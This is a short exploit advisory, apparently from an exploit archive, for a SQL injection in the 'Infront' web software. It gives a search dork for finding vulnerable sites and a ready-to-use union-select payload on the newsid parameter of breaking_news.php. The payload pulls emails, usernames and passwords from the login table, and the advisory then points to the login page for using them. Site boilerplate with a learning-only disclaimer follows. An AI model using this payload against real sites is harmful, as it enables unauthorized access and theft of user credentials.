# Exploit Title: Infront SQL Injection Vulnerability # Date: 12-06-2010 # Author: TheMaster <v4m@hotmail.de> # Software Link: http://www.infront.com/ # Version: N/A # Tested on: Windows XP SP3 Author : TheMaster <v4m@hotmail.de> Dork : intext:Powered by Infront Type of attack : SQLi File : breaking_news.php Exploit Code : http://target/path/breaking_news.php?newsid=union select 1,2,3,concat(email,0x3e,user,0x3e,pass),5,6+FROM+login After , you can login here : http://target/path/login.php demo : http://server/breaking_news.php?newsid=-103+UNION+SELECT+1,2,3,concat(email,0x3e,user,0x3e,pass),5,6+FROM+login-- GreeTz : SA H4x0r <Abu Saud> , HiV Sec Team , Sec4ever and v4-Team Members
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论